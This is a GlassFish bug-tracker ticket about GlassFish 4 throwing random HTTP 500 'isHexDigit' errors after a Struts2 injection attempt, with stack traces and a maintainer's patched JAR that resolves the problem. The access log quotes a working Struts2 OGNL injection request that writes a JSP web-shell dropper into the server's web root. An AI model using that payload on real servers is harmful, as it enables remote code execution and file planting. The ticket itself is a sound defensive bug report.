glassfish
  1. glassfish
  2. GLASSFISH-20840

Apache Struts2 Vulnerability causes Glassfish 4 server to through random Http 500 Internal Error - "isHexDigit" exception

    Details

    • Type: Bug Bug
    • Status: Resolved
    • Priority: Major Major
    • Resolution: Fixed
    • Affects Version/s: 4.0
    • Fix Version/s: None
    • Component/s: None
    • Labels:
      None

      Description

      For background, See https://www.mandiant.com/blog/responding-attacks-apache-struts2/

      In testing Struts 2.3.15.2 release fix under Glassfish 4 for above vulnerability, subsequent to issuing the malcious http injection, Glassfish continues to throw random Http 500 Internal Server error and "IsHexDigit Exception".

      Fix is to restart Glassfish.

      Glassfish Access Log:

      [Malicous injection]

      "127.0.0.1" "NULL-AUTH-USER" "01/Oct/2013:15:07:00 -0500" "GET /interscope/logon.action?redirect:$%7B%20req%3dcontext.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%20p%3d(req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll(%22////%22,%22/%22),%20new+java.io.BufferedWriter(new+java.io.FileWriter(p)).append(req.getParameter(%22c%22)).close()%20%7D&c=%3c%25%if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22/%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25 HTTP/1.1" 500 1389

      [many intervening successful requests..]

      [SUBSEQUENT USER REQUEST THROWS HTTP 500]

      "10.13.2.18" "NULL-AUTH-USER" "01/Oct/2013:15:08:12 -0500" "GET /interscope/browse.action?keys='design_contract.uid=8264|design_contract.project_sequence=8024|design_contract.designer_firm_id=951952590|designer.designer_firm_id=951952590|%20%20'&pageName=DesignerDetail&source=jsp HTTP/1.1" 500 1389

      Glassfish Server log:

      [HTTP 500 THROWN ON MALICIOUS INJECTION]

      [2013-10-01T15:07:00.550-0400] [glassfish 4.0] [WARNING] [] [javax.enterprise.web] [tid: _ThreadID=19 _ThreadName=http-listener-1(2)] [timeMillis: 1380654420550] [levelValue: 900] [[
      StandardWrapperValve[default]: Servlet.service() for servlet default threw exception
      java.lang.IllegalStateException: isHexDigit
      at org.glassfish.grizzly.http.util.URLDecoder.decode(URLDecoder.java:470)
      at org.glassfish.grizzly.http.util.Parameters.processParameters(Parameters.java:653)
      at org.glassfish.grizzly.http.util.Parameters.processParameters(Parameters.java:687)
      at org.glassfish.grizzly.http.util.Parameters.handleQueryParameters(Parameters.java:335)
      at org.glassfish.grizzly.http.server.Request.parseRequestParameters(Request.java:1995)
      at org.glassfish.grizzly.http.server.Request.getParameterNames(Request.java:1093)
      at org.apache.catalina.connector.Request.getParameterNames(Request.java:1591)
      at org.apache.catalina.connector.Request.getParameterMap(Request.java:1566)
      at org.apache.catalina.connector.RequestFacade.getParameterMap(RequestFacade.java:504)
      at org.apache.struts2.dispatcher.Dispatcher.createContextMap(Dispatcher.java:611)
      at org.apache.struts2.dispatcher.ng.PrepareOperations.createActionContext(PrepareOperations.java:78)
      at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:86)
      at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:256)
      at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:214)
      at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:316)
      at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:160)
      at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:734)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:673)
      at com.sun.enterprise.web.WebPipeline.invoke(WebPipeline.java:99)
      at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:174)
      at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:734)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:673)
      at org.apache.catalina.connector.CoyoteAdapter.doService(CoyoteAdapter.java:354)
      at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:260)
      at com.sun.enterprise.v3.services.impl.ContainerMapper.service(ContainerMapper.java:188)
      at org.glassfish.grizzly.http.server.HttpHandler.runService(HttpHandler.java:191)
      at org.glassfish.grizzly.http.server.HttpHandler.doHandle(HttpHandler.java:168)
      at org.glassfish.grizzly.http.server.HttpServerFilter.handleRead(HttpServerFilter.java:189)
      at org.glassfish.grizzly.filterchain.ExecutorResolver$9.execute(ExecutorResolver.java:119)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeFilter(DefaultFilterChain.java:288)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeChainPart(DefaultFilterChain.java:206)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.execute(DefaultFilterChain.java:136)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.process(DefaultFilterChain.java:114)
      at org.glassfish.grizzly.ProcessorExecutor.execute(ProcessorExecutor.java:77)
      at org.glassfish.grizzly.nio.transport.TCPNIOTransport.fireIOEvent(TCPNIOTransport.java:838)
      at org.glassfish.grizzly.strategies.AbstractIOStrategy.fireIOEvent(AbstractIOStrategy.java:113)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.run0(WorkerThreadIOStrategy.java:115)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.access$100(WorkerThreadIOStrategy.java:55)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy$WorkerThreadRunnable.run(WorkerThreadIOStrategy.java:135)
      at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.doWork(AbstractThreadPool.java:564)
      at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.run(AbstractThreadPool.java:544)
      at java.lang.Thread.run(Thread.java:724)
      ]]
      [HTTP 500 THROWN ON USER REQUEST]

      [2013-10-01T15:08:12.128-0400] [glassfish 4.0] [WARNING] [] [javax.enterprise.web] [tid: _ThreadID=19 _ThreadName=http-listener-1(2)] [timeMillis: 1380654492128] [levelValue: 900] [[
      StandardWrapperValve[default]: Servlet.service() for servlet default threw exception
      java.lang.IllegalStateException: isHexDigit
      at org.glassfish.grizzly.http.util.URLDecoder.decode(URLDecoder.java:470)
      at org.glassfish.grizzly.http.util.Parameters.processParameters(Parameters.java:653)
      at org.glassfish.grizzly.http.util.Parameters.processParameters(Parameters.java:687)
      at org.glassfish.grizzly.http.util.Parameters.handleQueryParameters(Parameters.java:335)
      at org.glassfish.grizzly.http.server.Request.parseRequestParameters(Request.java:1995)
      at org.glassfish.grizzly.http.server.Request.getParameterNames(Request.java:1093)
      at org.apache.catalina.connector.Request.getParameterNames(Request.java:1591)
      at org.apache.catalina.connector.Request.getParameterMap(Request.java:1566)
      at org.apache.catalina.connector.RequestFacade.getParameterMap(RequestFacade.java:504)
      at org.apache.struts2.dispatcher.Dispatcher.createContextMap(Dispatcher.java:611)
      at org.apache.struts2.dispatcher.ng.PrepareOperations.createActionContext(PrepareOperations.java:78)
      at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:86)
      at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:256)
      at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:214)
      at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:316)
      at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:160)
      at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:734)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:673)
      at com.sun.enterprise.web.WebPipeline.invoke(WebPipeline.java:99)
      at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:174)
      at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:734)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:673)
      at org.apache.catalina.connector.CoyoteAdapter.doService(CoyoteAdapter.java:354)
      at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:260)
      at com.sun.enterprise.v3.services.impl.ContainerMapper.service(ContainerMapper.java:188)
      at org.glassfish.grizzly.http.server.HttpHandler.runService(HttpHandler.java:191)
      at org.glassfish.grizzly.http.server.HttpHandler.doHandle(HttpHandler.java:168)
      at org.glassfish.grizzly.http.server.HttpServerFilter.handleRead(HttpServerFilter.java:189)
      at org.glassfish.grizzly.filterchain.ExecutorResolver$9.execute(ExecutorResolver.java:119)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeFilter(DefaultFilterChain.java:288)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeChainPart(DefaultFilterChain.java:206)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.execute(DefaultFilterChain.java:136)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.process(DefaultFilterChain.java:114)
      at org.glassfish.grizzly.ProcessorExecutor.execute(ProcessorExecutor.java:77)
      at org.glassfish.grizzly.nio.transport.TCPNIOTransport.fireIOEvent(TCPNIOTransport.java:838)
      at org.glassfish.grizzly.strategies.AbstractIOStrategy.fireIOEvent(AbstractIOStrategy.java:113)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.run0(WorkerThreadIOStrategy.java:115)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.access$100(WorkerThreadIOStrategy.java:55)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy$WorkerThreadRunnable.run(WorkerThreadIOStrategy.java:135)
      at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.doWork(AbstractThreadPool.java:564)
      at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.run(AbstractThreadPool.java:544)
      at java.lang.Thread.run(Thread.java:724)
      ]]

        Activity

        Hide
        Ryan Lubke added a comment -

        So far, given the information you've provided, I've been unable to trigger the error.

        So, I have a few questions:

        1) Are you able to reproduce this fairly easily in your environment or is it very intermittent
        2) If it is fairly easy for you to reproduce, would it be possible for you to package a test case that I can deploy
        locally to help facilitate a speedy resolution?

        Thanks

        Show
        Ryan Lubke added a comment - So far, given the information you've provided, I've been unable to trigger the error. So, I have a few questions: 1) Are you able to reproduce this fairly easily in your environment or is it very intermittent 2) If it is fairly easy for you to reproduce, would it be possible for you to package a test case that I can deploy locally to help facilitate a speedy resolution? Thanks
        Hide
        Ryan Lubke added a comment -

        Please try the attached JAR. Backup the existing jar in $GF_HOME/modules and drop this one in its place.

        This doesn't 'fix' the isHexDigit exception as the query string in the log is invalid, but it will resolve the subsequent random failures on other query strings.

        Show
        Ryan Lubke added a comment - Please try the attached JAR. Backup the existing jar in $GF_HOME/modules and drop this one in its place. This doesn't 'fix' the isHexDigit exception as the query string in the log is invalid, but it will resolve the subsequent random failures on other query strings.
        Hide
        megioielli added a comment -

        Thanks Ryan.. I will download the updated jar and retest for the exception.

        Show
        megioielli added a comment - Thanks Ryan.. I will download the updated jar and retest for the exception.
        Hide
        megioielli added a comment -

        The patch jarfile has resolved the subsequent "isHexDigit" exceptions.

        Thank you.

        To answer your original questions:

        1) Are you able to reproduce this fairly easily in your environment or is it very intermittent

        It is easy to reproduce after the offending injection is executed but subsequent exceptions are random. Some requests process normally while others exception out.. no consistency there.

        2) If it is fairly easy for you to reproduce, would it be possible for you to package a test case that I can deploy locally to help facilitate a speedy resolution?

        Unfortunately no.. This application is a production website that supports the State Construction Office for the State Of North Carolina. It would require an entire installation of all components (web, clients, databases, etc.)...

        Show
        megioielli added a comment - The patch jarfile has resolved the subsequent "isHexDigit" exceptions. Thank you. To answer your original questions: 1) Are you able to reproduce this fairly easily in your environment or is it very intermittent It is easy to reproduce after the offending injection is executed but subsequent exceptions are random. Some requests process normally while others exception out.. no consistency there. 2) If it is fairly easy for you to reproduce, would it be possible for you to package a test case that I can deploy locally to help facilitate a speedy resolution? Unfortunately no.. This application is a production website that supports the State Construction Office for the State Of North Carolina. It would require an entire installation of all components (web, clients, databases, etc.)...

          People

          • Assignee:
            michael.y.chen
            Reporter:
            megioielli
          • Votes:
            0 Vote for this issue
            Watchers:
            0 Start watching this issue

            Dates

            • Created:
              Updated:
              Resolved: